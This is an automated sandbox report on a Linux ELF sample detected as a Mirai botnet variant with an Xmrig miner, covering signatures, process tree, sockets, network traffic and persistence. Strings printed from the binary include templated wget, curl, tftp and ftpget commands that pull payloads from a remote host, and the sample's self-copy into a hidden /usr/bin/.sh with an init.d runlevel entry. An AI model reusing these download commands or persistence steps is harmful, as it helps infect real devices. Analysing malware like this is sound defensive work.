Edit tour

Linux Analysis Report
morte.m68k.elf

Overview

General Information

Sample name:	morte.m68k.elf
Analysis ID:	1729418
Has dependencies:	false
MD5:	fd9877fcd67cda3221f58731bcd32b54
SHA1:	3873a5eefc7e1bd4438740bbcabd3b12a8615856
SHA256:	c2f553cbe5bf2dd338b6c9d22ed8e8f1687431fa3404c9e7d2b3ddc46f958797
Tags:	elfMiraiuser-abuse_ch
Infos:

Detection

Mirai, Xmrig

Score:	100
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Xmrig cryptocurrency miner

Deletes system log files

Drops files in suspicious directories

Drops invisible ELF files

Found strings related to Crypto-Mining

Manipulation of devices in /dev

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1729418
Start date and time:	2025-07-06 08:11:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	morte.m68k.elf
Detection:	MAL
Classification:	mal100.troj.evad.mine.linELF@0/3@0/0

Warnings

Connection to analysis system has been lost, crash info: Unknown

Runtime Messages

Command:	/tmp/morte.m68k.elf
PID:	5804
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

morte.m68k.elf (PID: 5804, Parent: 5722, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/morte.m68k.elf

morte.m68k.elf New Fork (PID: 5806, Parent: 5804)

morte.m68k.elf New Fork (PID: 5808, Parent: 5806)

morte.m68k.elf New Fork (PID: 5817, Parent: 5808)

sh (PID: 5817, Parent: 5808, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp /tmp/morte.m68k.elf /usr/bin/.sh"

sh New Fork (PID: 5822, Parent: 5817)

cp (PID: 5822, Parent: 5817, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /tmp/morte.m68k.elf /usr/bin/.sh

morte.m68k.elf New Fork (PID: 5825, Parent: 5808)

morte.m68k.elf New Fork (PID: 5827, Parent: 5825)

morte.m68k.elf New Fork (PID: 5829, Parent: 5825)

gvfsd-fuse New Fork (PID: 5836, Parent: 3147)

fusermount (PID: 5836, Parent: 3147, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs

python3.8 New Fork (PID: 5838, Parent: 5835)

gdbus (PID: 5838, Parent: 5835, MD5: 1deb65de9f7f468799d3bfde20118a9b) Arguments: /usr/bin/gdbus call -e -d org.gnome.SessionManager -o /org/gnome/SessionManager -m org.gnome.SessionManager.IsSessionRunning

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
XMRIG		No Attribution	https://www.aquasec.com/blog/container-security-tnt-container-attack/ https://www.aquasec.com/blog/pg_mem-a-malware-hidden-in-the-postgres-processes/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
morte.m68k.elf	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
morte.m68k.elf	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/.sh	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
/usr/bin/.sh	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Process Memory Space: morte.m68k.elf PID: 5804	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: morte.m68k.elf PID: 5804	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Process Memory Space: morte.m68k.elf PID: 5806	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: morte.m68k.elf PID: 5806	JoeSecurity_Mirai_3	Yara detected Mirai	Joe Security
Click to see the 3 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: morte.m68k.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/bin/.sh

Avira: detection malicious, Label: LINUX/Mirai.bonb

Multi AV Scanner detection for submitted file

Source: morte.m68k.elf	Virustotal: Detection: 50%			Perma Link
Source: morte.m68k.elf	ReversingLabs: Detection: 58%

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: morte.m68k.elf, type: SAMPLE
Source: Yara match	File source: 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: morte.m68k.elf PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: morte.m68k.elf PID: 5806, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/.sh, type: DROPPED

Found strings related to Crypto-Mining

Source: morte.m68k.elf, 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp

String found in binary or memory: cryptonight

Source: morte.m68k.elf	String: ^H/run/shm/data/local/tmpabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/var/mnt/root/boot/bin/sbin/home/dev/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/usr/sbin/ps/usr/bin/ps/usr/sbin/passwd/usr/bin/passwd/usr/sbin/rm/usr/bin/rm
Source: morte.m68k.elf	String: GFHICK"/var/run//mnt//root//var//var/tmp/m68k%s%swget http://%s/%s/%s -O %scurl -o %s http://%s/%s/%stftp %s -c get %s %scd %s && tftp -g -r %s %sftpget -v -u anonymous -p anonymous -P 21 %s %s %s
Source: .sh.18.dr	String: ^H/run/shm/data/local/tmpabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/var/mnt/root/boot/bin/sbin/home/dev/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/usr/sbin/ps/usr/bin/ps/usr/sbin/passwd/usr/bin/passwd/usr/sbin/rm/usr/bin/rm
Source: .sh.18.dr	String: GFHICK"/var/run//mnt//root//var//var/tmp/m68k%s%swget http://%s/%s/%s -O %scurl -o %s http://%s/%s/%stftp %s -c get %s %scd %s && tftp -g -r %s %sftpget -v -u anonymous -p anonymous -P 21 %s %s %s

Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:1338	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:1111	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:1213	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:1234	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:333	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:666	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:777	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:9999	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:5656	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:8585	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:6363	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:6969	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:3779	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:3778	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:38273	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:10345	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:23455	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:1991	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:21769	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:42352	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:48101	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:39182	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:47767	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:6667	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:1337	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:4321	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:232	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:24136	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12146	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30062	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12147	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26733	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:47	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25697	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29793	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12140	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28515	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:24940	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12148	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28016	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:97	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25187	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25701	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26215	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26729	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:27243	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:27757	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28271	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28785	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29299	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29813	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30327	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30841	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:31297	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:16963	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:17477	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:17991	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:18505	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:19019	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:19533	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:20047	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:20561	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:21075	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:21589	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:22103	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:22617	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:23088	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12594	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:13108	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:13622	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:14136	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:14592	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12150	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:24946	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28014	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29696	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28527	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12130	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26990	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29538	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26735	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28005	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30208	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12132	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25974	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12131	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28526	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29551	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:27749	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30305	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29231	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:27753	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25135	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25711	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25451	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25970	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30067	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25954	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12149	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29554	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25193	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28207	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29544	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30068	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30574	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12144	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28535	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28518	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26112	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26721	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:27764	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12151	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:26469	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25461	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29292	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12134	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29808	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29798	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:31074	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28536	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25205	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29561	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25199	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30720	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28261	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29811	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:12142	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:25972	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29556	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:24948	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29440	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:28769	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:29555	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:30564	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	Socket: 0.0.0.0:27904	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.14:37518 -> 65.222.202.53:80

Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53
Source: unknown	TCP traffic detected without corresponding DNS query: 65.222.202.53

Source: Initial sample	String containing 'busybox' found: /usr/sbin/busybox
Source: Initial sample	String containing 'busybox' found: /usr/bin/busybox
Source: Initial sample	String containing 'busybox' found: ^H/run/shm/data/local/tmpabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/var/mnt/root/boot/bin/sbin/home/dev/dev/console/var/lib/docker/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt/usr/sbin/wget/usr/bin/wget/usr/sbin/curl/usr/bin/curl/usr/sbin/ftpget/usr/bin/ftpget/usr/sbin/tftp/usr/bin/tftp/usr/sbin/busybox/usr/bin/busybox/usr/sbin/netstat/usr/bin/netstat/usr/sbin/ps/usr/bin/ps/usr/sbin/passwd/usr/bin/passwd/usr/sbin/rm/usr/bin/rm

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/morte.m68k.elf (PID: 5825)	SIGKILL sent: pid: 1399, result: successful	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	SIGKILL sent: pid: 1399, result: no such process	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	SIGKILL sent: pid: 2991, result: successful	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5825)	SIGKILL sent: pid: 3125, result: successful	Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.mine.linELF@0/3@0/0

Data Obfuscation

Manipulation of devices in /dev

Source: /tmp/morte.m68k.elf (PID: 5829)	Deleted: /dev/null			Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5829)	Deleted: /dev/kmsg			Jump to behavior

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /bin/fusermount (PID: 5836)

File: /proc/5836/mounts

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/morte.m68k.elf (PID: 5808)

File: /etc/rc2.d/S99sysd -> /etc/init.d/sysd

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/morte.m68k.elf (PID: 5808)

File: /etc/init.d/sysd (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Source: /usr/bin/cp (PID: 5822)

File: /usr/bin/.sh

Jump to behavior

Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3760/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1583/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/2672/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/110/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/3759/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/112/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/113/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/1577/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/114/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/115/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/116/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/117/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/118/cmdline	Jump to behavior
Source: /tmp/morte.m68k.elf (PID: 5808)	File opened: /proc/119/cmdline	Jump to behavior
